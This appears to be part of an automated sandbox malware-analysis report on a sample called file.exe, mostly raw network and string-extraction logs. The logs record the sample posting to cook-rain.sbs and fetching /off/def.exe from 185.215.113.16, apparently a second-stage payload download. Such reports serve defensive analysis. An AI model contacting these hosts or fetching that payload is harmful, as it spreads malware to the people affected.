              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1982062879.0000000001221000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1922173062.0000000001220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_109.6.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_109.6.dr, chromecache_110.6.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_109.6.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_109.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_109.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.1796065405.0000000005B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.1796065405.0000000005B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: file.exe, 00000000.00000003.1921509189.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_109.6.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.1796065405.0000000005B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chromecache_109.6.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: chromecache_101.6.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.1726720426.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1726720426.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750187521.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750347316.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1726872791.0000000005BB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: file.exe, 00000000.00000003.1726872791.0000000005B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: file.exe, 00000000.00000003.1726720426.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750187521.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750347316.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1726872791.0000000005BB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: file.exe, 00000000.00000003.1726872791.0000000005B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_101.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_89.6.dr, chromecache_101.6.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
